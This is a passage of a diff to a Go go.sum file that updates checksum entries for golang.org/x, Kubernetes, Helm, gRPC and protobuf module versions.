v0.0.0-20210825183410-e898025ed96a/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20211015210444-4f30a5c0130f/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20211209124913-491a49abca63 h1:iocB37TsdFuN6IBRZ+ry36wrkoV51/tl5vOWqkcPGvY= +golang.org/x/net v0.0.0-20211209124913-491a49abca63/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= @@ -1230,8 +1296,11 @@ golang.org/x/oauth2 v0.0.0-20201208152858-08078c50e5b5/go.mod h1:KelEdhl1UZF7XfJ golang.org/x/oauth2 v0.0.0-20210218202405-ba52d332ba99/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= golang.org/x/oauth2 v0.0.0-20210220000619-9bb904979d93/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= golang.org/x/oauth2 v0.0.0-20210313182246-cd4f82c27b84/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= -golang.org/x/oauth2 v0.0.0-20210402161424-2e8d93401602 h1:0Ja1LBD+yisY6RWM/BH7TJVXWsSjs2VwBSmvSX4HdBc= golang.org/x/oauth2 v0.0.0-20210402161424-2e8d93401602/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210514164344-f6687ab2804c/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210819190943-2bc19b11175f/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20211104180415-d3ed0bb246c8 h1:RerP+noqYHUQ8CMRcPlC2nvTa4dcBIjegkuWdcUDuqg= +golang.org/x/oauth2 v0.0.0-20211104180415-d3ed0bb246c8/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= @@ -1332,22 +1401,30 @@ golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20210324051608-47abb6519492/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210420072515-93ed5bcd2bfe/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210426230700-d19ff857e887/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210502180810-71e4cd670f79/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210603081109-ebe580a85c40/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210616094352-59db8d763f22/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210831042530-f4d43177bf5e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210927094055-39ccf1dd6fa6/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20211013075003-97ac67df715c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= -golang.org/x/sys v0.0.0-20211102192858-4dd72447c267 h1:7zYaz3tjChtpayGDzu6H0hDAUM5zIGA2XW7kRNgQ0jc= +golang.org/x/sys v0.0.0-20211019181941-9d821ace8654/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20211102192858-4dd72447c267/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20211214150614-024a26f5d6e2 h1:oJg+vmWs1UY4oSg6n1drFSkU2Nc48mxtz5qhA0HaG0I= +golang.org/x/sys v0.0.0-20211214150614-024a26f5d6e2/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210220032956-6a3ed077a48d/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= -golang.org/x/term v0.0.0-20210503060354-a79de5458b56 h1:b8jxX3zqjpqb2LklXPzKSGJhzyxCOZSz8ncv8Nv+y7w= golang.org/x/term v0.0.0-20210503060354-a79de5458b56/go.mod h1:tfny5GFUkzUvx4ps4ajbZsCe5lw1metzhBm9T3x7oIY= +golang.org/x/term v0.0.0-20210615171337-6886f2dfbf5b/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= +golang.org/x/term v0.0.0-20210927222741-03fcf44c2211 h1:JGgROgKl9N8DuW20oFS5gxc+lE67/N3FcwmBPMe7ArY= +golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= @@ -1355,16 +1432,18 @@ golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.4/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= -golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.7 h1:olpwvP2KacW1ZWvsR7uQhoyTYvKAupfQrRGBFM352Gk= +golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/time v0.0.0-20180412165947-fbb02b2291d2/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20191024005414-555d28b269f0/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20200630173020-3af7569d3a1e/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20210220033141-f8bda1e9f3ba/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= -golang.org/x/time v0.0.0-20210723032227-1f47c861a9ac h1:7zkz7BUtwNFFqcowJ+RIgu2MaV/MapERkDIy+mwPyjs= golang.org/x/time v0.0.0-20210723032227-1f47c861a9ac/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= +golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11 h1:GZokNIeuVkl3aZHJchRrr13WCsols02MLUcz1U9is6M= +golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/tools v0.0.0-20180221164845-07fd8470d635/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= @@ -1430,8 +1509,11 @@ golang.org/x/tools v0.0.0-20210105154028-b0ab187a4818/go.mod h1:emZCQorbCU4vsT4f golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA= golang.org/x/tools v0.1.0/go.mod h1:xkSsbof2nBLbhDlRMhhhyNLN/zl3eTqcnHD5viDpcZ0= golang.org/x/tools v0.1.2/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= -golang.org/x/tools v0.1.7 h1:6j8CgantCy3yc8JGBqkDLMKWqZ0RDU2g1HVgacojGWQ= +golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= +golang.org/x/tools v0.1.6-0.20210820212750-d4cc65f0b2ff/go.mod h1:YD9qOF0M9xpSpdWTBbzEl5e/RnCefISl8E5Noe10jFM= golang.org/x/tools v0.1.7/go.mod h1:LGqMHiF4EqQNHR1JncWGqT5BVaXmza+X+BDGol+dOxo= +golang.org/x/tools v0.1.8 h1:P1HhGGuLW4aAclzjtmJdf0mJOjVUZUzOTqkAkWL+l6w= +golang.org/x/tools v0.1.8/go.mod h1:nABZi5QlRsZVlzPpHl034qft6wpY4eDcsTt5AaioBiU= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= @@ -1504,6 +1586,7 @@ google.golang.org/genproto v0.0.0-20200804131852-c06518451d9c/go.mod h1:FWY/as6D google.golang.org/genproto v0.0.0-20200825200019-8632dd797987/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= google.golang.org/genproto v0.0.0-20200904004341-0bd0a958aa1d/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= google.golang.org/genproto v0.0.0-20201019141844-1ed22bb0c154/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= +google.golang.org/genproto v0.0.0-20201102152239-715cce707fb0/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= google.golang.org/genproto v0.0.0-20201109203340-2640f1f9cdfb/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= google.golang.org/genproto v0.0.0-20201110150050-8816d57aaa9a/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= google.golang.org/genproto v0.0.0-20201201144952-b05cb90ed32e/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= @@ -1515,6 +1598,7 @@ google.golang.org/genproto v0.0.0-20210310155132-4ce2db91004e/go.mod h1:FWY/as6D google.golang.org/genproto v0.0.0-20210319143718-93e7006c17a6/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= google.golang.org/genproto v0.0.0-20210402141018-6c239bbf2bb1/go.mod h1:9lPAdzaEmUacj36I+k7YKbEc5CXzPIeORRgDAUOu28A= google.golang.org/genproto v0.0.0-20210602131652-f16073e35f0c/go.mod h1:UODoCrxHCcBojKKwX1terBiRUaqAsFqJiF615XL43r0= +google.golang.org/genproto v0.0.0-20210831024726-fe130286e0e2/go.mod h1:eFjDcFEctNawg4eG61bRv87N7iHBWyVhJu7u1kqDUXY= google.golang.org/grpc v0.0.0-20160317175043-d3ddb4469d5a/go.mod h1:yo6s7OP7yaDglbqo1J04qKzAhqBH6lvTonzMVmEdcZw= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= @@ -1540,6 +1624,7 @@ google.golang.org/grpc v1.36.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAG google.golang.org/grpc v1.36.1/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= google.golang.org/grpc v1.37.0/go.mod h1:NREThFqKR1f3iQ6oBuvc5LadQuXVGo9rkm5ZGrQdJfM= google.golang.org/grpc v1.38.0/go.mod h1:NREThFqKR1f3iQ6oBuvc5LadQuXVGo9rkm5ZGrQdJfM= +google.golang.org/grpc v1.40.0/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= @@ -1551,8 +1636,9 @@ google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpAD google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= -google.golang.org/protobuf v1.26.0 h1:bxAC2xTBsZGibn2RTntX0oH50xLsqy1OxA9tTL3p/lk= google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +google.golang.org/protobuf v1.27.1 h1:SnqbnDw1V7RiZcXPx5MEeqPv2s79L9i7BJUlG/+RurQ= +google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= gopkg.in/airbrake/gobrake.v2 v2.0.9/go.mod h1:/h5ZAUhDkGaJfjzjKLSjv6zCL6O0LLBxU4K+aSYdM/U= gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= @@ -1601,8 +1687,8 @@ gotest.tools v2.2.0+incompatible/go.mod h1:DsYFclhRJ6vuDpmuTbkuFWG+y2sxOXAzmJt81 gotest.tools/v3 v3.0.2/go.mod h1:3SzNCllyD9/Y+b5r9JIKQ474KzkZyqLqEfYqMsX94Bk= gotest.tools/v3 v3.0.3 h1:4AuOwCGf4lLR9u3YOe2awrHygurzhO/HeQ6laiA6Sx0= gotest.tools/v3 v3.0.3/go.mod h1:Z7Lb0S5l+klDB31fvDQX8ss/FlKDxtlFlw3Oa8Ymbl8= -helm.sh/helm/v3 v3.7.1 h1:kED/HWx09QHHSJhYaJY6ttj/BhmzBmT1oupKslncibY= -helm.sh/helm/v3 v3.7.1/go.mod h1:3eOeBD3Z+O/ELiuu19zynZSN8jP1ErXLuyP21SZeMq8= +helm.sh/helm/v3 v3.7.2 h1:xn1OxcZEpgKpp4CCpPz1KKUyb9gAtTouXV2E3S8ChYQ= +helm.sh/helm/v3 v3.7.2/go.mod h1:UXuiAn0+FfBpqbiMuwWt8/aAKkfJvnWLBJ6f4HcFs0M= honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= honnef.co/go/tools v0.0.0-20190106161140-3f1c8253044a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= honnef.co/go/tools v0.0.0-20190418001031-e561f6794a2a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= @@ -1617,59 +1703,72 @@ howett.net/plist v0.0.0-20201203080718-1454fab16a06/go.mod h1:vMygbs4qMhSZSc4lCU k8s.io/api v0.20.1/go.mod h1:KqwcCVogGxQY3nBlRpwt+wpAMF/KjaCc7RpywacvqUo= k8s.io/api v0.20.4/go.mod h1:++lNL1AJMkDymriNniQsWRkMDzRaX2Y/POTUi8yvqYQ= k8s.io/api v0.20.6/go.mod h1:X9e8Qag6JV/bL5G6bU8sdVRltWKmdHsFUGS3eVndqE8= -k8s.io/api v0.22.1/go.mod h1:bh13rkTp3F1XEaLGykbyRD2QaTTzPm0e/BMd8ptFONY= -k8s.io/api v0.22.3 h1:wOoES2GoSkUsdped2RB4zYypPqWtvprGoKCENTOOjP4= -k8s.io/api v0.22.3/go.mod h1:azgiXFiXqiWyLCfI62/eYBOu19rj2LKmIhFPP4+33fs= -k8s.io/apiextensions-apiserver v0.22.1 h1:YSJYzlFNFSfUle+yeEXX0lSQyLEoxoPJySRupepb0gE= -k8s.io/apiextensions-apiserver v0.22.1/go.mod h1:HeGmorjtRmRLE+Q8dJu6AYRoZccvCMsghwS8XTUYb2c= +k8s.io/api v0.22.4/go.mod h1:Rgs+9gIGYC5laXQSZZ9JqT5NevNgoGiOdVWi1BAB3qk= +k8s.io/api v0.23.0 h1:WrL1gb73VSC8obi8cuYETJGXEoFNEh3LU0Pt+Sokgro= +k8s.io/api v0.23.0/go.mod h1:8wmDdLBHBNxtOIytwLstXt5E9PddnZb0GaMcqsvDBpg= +k8s.io/apiextensions-apiserver v0.22.4/go.mod h1:kH9lxD8dbJ+k0ZizGET55lFgdGjO8t45fgZnCVdZEpw= +k8s.io/apiextensions-apiserver v0.23.0 h1:uii8BYmHYiT2ZTAJxmvc3X8UhNYMxl2A0z0Xq3Pm+WY= +k8s.io/apiextensions-apiserver v0.23.0/go.mod h1:xIFAEEDlAZgpVBl/1VSjGDmLoXAWRG40+GsWhKhAxY4= k8s.io/apimachinery v0.20.1/go.mod h1:WlLqWAHZGg07AeltaI0MV5uk1Omp8xaN0JGLY6gkRpU= k8s.io/apimachinery v0.20.4/go.mod h1:WlLqWAHZGg07AeltaI0MV5uk1Omp8xaN0JGLY6gkRpU= k8s.io/apimachinery v0.20.6/go.mod h1:ejZXtW1Ra6V1O5H8xPBGz+T3+4gfkTCeExAHKU57MAc= -k8s.io/apimachinery v0.22.1/go.mod h1:O3oNtNadZdeOMxHFVxOreoznohCpy0z6mocxbZr7oJ0= -k8s.io/apimachinery v0.22.3 h1:mrvBG5CZnEfwgpVqWcrRKvdsYECTrhAR6cApAgdsflk= -k8s.io/apimachinery v0.22.3/go.mod h1:O3oNtNadZdeOMxHFVxOreoznohCpy0z6mocxbZr7oJ0= +k8s.io/apimachinery v0.22.4/go.mod h1:yU6oA6Gnax9RrxGzVvPFFJ+mpnW6PBSqp0sx0I0HHW0= +k8s.io/apimachinery v0.23.0 h1:mIfWRMjBuMdolAWJ3Fd+aPTMv3X9z+waiARMpvvb0HQ= +k8s.io/apimachinery v0.23.0/go.mod h1:fFCTTBKvKcwTPFzjlcxp91uPFZr+JA0FubU4fLzzFYc= k8s.io/apiserver v0.20.1/go.mod h1:ro5QHeQkgMS7ZGpvf4tSMx6bBOgPfE+f52KwvXfScaU= k8s.io/apiserver v0.20.4/go.mod h1:Mc80thBKOyy7tbvFtB4kJv1kbdD0eIH8k8vianJcbFM= k8s.io/apiserver v0.20.6/go.mod h1:QIJXNt6i6JB+0YQRNcS0hdRHJlMhflFmsBDeSgT1r8Q= -k8s.io/apiserver v0.22.1/go.mod h1:2mcM6dzSt+XndzVQJX21Gx0/Klo7Aen7i0Ai6tIa400= -k8s.io/cli-runtime v0.22.1/go.mod h1:YqwGrlXeEk15Yn3em2xzr435UGwbrCw5x+COQoTYfoo= -k8s.io/cli-runtime v0.22.3 h1:AeOgaDpb/k36amWsjyyIU+FLpLzzdmoLD5gn38c5fio= -k8s.io/cli-runtime v0.22.3/go.mod h1:um6JvCxV9Hrhq0zCUxcqYoY7/wF64g6IYgOViI8sg6Q= +k8s.io/apiserver v0.22.4/go.mod h1:38WmcUZiiy41A7Aty8/VorWRa8vDGqoUzDf2XYlku0E= +k8s.io/apiserver v0.23.0/go.mod h1:Cec35u/9zAepDPPFyT+UMrgqOCjgJ5qtfVJDxjZYmt4= +k8s.io/cli-runtime v0.22.4/go.mod h1:x35r0ERHXr/MrbR1C6MPJxQ3xKG6+hXi9m2xLzlMPZA= +k8s.io/cli-runtime v0.23.0 h1:UONt0BV2+edjUVAXuR1nnOAL2CB9r+Gl9yk4UBQpKfs= +k8s.io/cli-runtime v0.23.0/go.mod h1:B5N3YH0KP1iKr6gEuJ/RRmGjO0mJQ/f/JrsmEiPQAlU= k8s.io/client-go v0.20.1/go.mod h1:/zcHdt1TeWSd5HoUe6elJmHSQ6uLLgp4bIJHVEuy+/Y= k8s.io/client-go v0.20.4/go.mod h1:LiMv25ND1gLUdBeYxBIwKpkSC5IsozMMmOOeSJboP+k= k8s.io/client-go v0.20.6/go.mod h1:nNQMnOvEUEsOzRRFIIkdmYOjAZrC8bgq0ExboWSU1I0= -k8s.io/client-go v0.22.1/go.mod h1:BquC5A4UOo4qVDUtoc04/+Nxp1MeHcVc1HJm1KmG8kk= -k8s.io/client-go v0.22.3 h1:6onkOSc+YNdwq5zXE0wFXicq64rrym+mXwHu/CPVGO4= -k8s.io/client-go v0.22.3/go.mod h1:ElDjYf8gvZsKDYexmsmnMQ0DYO8W9RwBjfQ1PI53yow= -k8s.io/code-generator v0.22.1/go.mod h1:eV77Y09IopzeXOJzndrDyCI88UBok2h6WxAlBwpxa+o= +k8s.io/client-go v0.22.4/go.mod h1:Yzw4e5e7h1LNHA4uqnMVrpEpUs1hJOiuBsJKIlRCHDA= +k8s.io/client-go v0.23.0 h1:vcsOqyPq7XV3QmQRCBH/t9BICJM9Q1M18qahjv+rebY= +k8s.io/client-go v0.23.0/go.mod h1:hrDnpnK1mSr65lHHcUuIZIXDgEbzc7/683c6hyG4jTA= +k8s.io/code-generator v0.22.4/go.mod h1:qjYl54pQ/emhkT0UxbufbREYJMWsHNNV/jSVwhYZQGw= +k8s.io/code-generator v0.23.0/go.mod h1:vQvOhDXhuzqiVfM/YHp+dmg10WDZCchJVObc9MvowsE= k8s.io/component-base v0.20.1/go.mod h1:guxkoJnNoh8LNrbtiQOlyp2Y2XFCZQmrcg2n/DeYNLk= k8s.io/component-base v0.20.4/go.mod h1:t4p9EdiagbVCJKrQ1RsA5/V4rFQNDfRlevJajlGwgjI= k8s.io/component-base v0.20.6/go.mod h1:6f1MPBAeI+mvuts3sIdtpjljHWBQ2cIy38oBIWMYnrM= -k8s.io/component-base v0.22.1 h1:SFqIXsEN3v3Kkr1bS6rstrs1wd45StJqbtgbQ4nRQdo= -k8s.io/component-base v0.22.1/go.mod h1:0D+Bl8rrnsPN9v0dyYvkqFfBeAd4u7n77ze+p8CMiPo= -k8s.io/component-helpers v0.22.1/go.mod h1:QvBcDbX+qU5I2tMZABBF5fRwAlQwiv771IGBHK9WYh4= +k8s.io/component-base v0.22.4/go.mod h1:MrSaQy4a3tFVViff8TZL6JHYSewNCLshZCwHYM58v5A= +k8s.io/component-base v0.23.0 h1:UAnyzjvVZ2ZR1lF35YwtNY6VMN94WtOnArcXBu34es8= +k8s.io/component-base v0.23.0/go.mod h1:DHH5uiFvLC1edCpvcTDV++NKULdYYU6pR9Tt3HIKMKI= +k8s.io/component-helpers v0.22.4/go.mod h1:A50qTyczDFbhZDifIfS2zFrHuPk9UNOWPpvNZ+3RSIs= +k8s.io/component-helpers v0.23.0/go.mod h1:liXMh6FZS4qamKtMJQ7uLHnFe3tlC86RX5mJEk/aerg= k8s.io/cri-api v0.17.3/go.mod h1:X1sbHmuXhwaHs9xxYffLqJogVsnI+f6cPRcgPel7ywM= k8s.io/cri-api v0.20.1/go.mod h1:2JRbKt+BFLTjtrILYVqQK5jqhI+XNdF6UiGMgczeBCI= k8s.io/cri-api v0.20.4/go.mod h1:2JRbKt+BFLTjtrILYVqQK5jqhI+XNdF6UiGMgczeBCI= k8s.io/cri-api v0.20.6/go.mod h1:ew44AjNXwyn1s0U4xCKGodU7J1HzBeZ1MpGrpa5r8Yc= k8s.io/gengo v0.0.0-20200413195148-3a45101e95ac/go.mod h1:ezvh/TsK7cY6rbqRK0oQQ8IAqLxYwwyPxAX1Pzy0ii0= k8s.io/gengo v0.0.0-20201214224949-b6c5ce23f027/go.mod h1:FiNAH4ZV3gBg2Kwh89tzAEV2be7d5xI0vBa/VySYy3E= +k8s.io/gengo v0.0.0-20210813121822-485abfe95c7c/go.mod h1:FiNAH4ZV3gBg2Kwh89tzAEV2be7d5xI0vBa/VySYy3E= k8s.io/klog/v2 v2.0.0/go.mod h1:PBfzABfn139FHAV07az/IF9Wp1bkk3vpT2XSJ76fSDE= k8s.io/klog/v2 v2.2.0/go.mod h1:Od+F08eJP+W3HUb4pSrPpgp9DGU4GzlpG/TmITuYh/Y= k8s.io/klog/v2 v2.4.0/go.mod h1:Od+F08eJP+W3HUb4pSrPpgp9DGU4GzlpG/TmITuYh/Y= -k8s.io/klog/v2 v2.9.0 h1:D7HV+n1V57XeZ0m6tdRkfknthUaM06VFbWldOFh8kzM= k8s.io/klog/v2 v2.9.0/go.mod h1:hy9LJ/NvuK+iVyP4Ehqva4HxZG/oXyIS3n3Jmire4Ec= +k8s.io/klog/v2 v2.30.0 h1:bUO6drIvCIsvZ/XFgfxoGFQU/a4Qkh0iAlvUR7vlHJw= +k8s.io/klog/v2 v2.30.0/go.mod 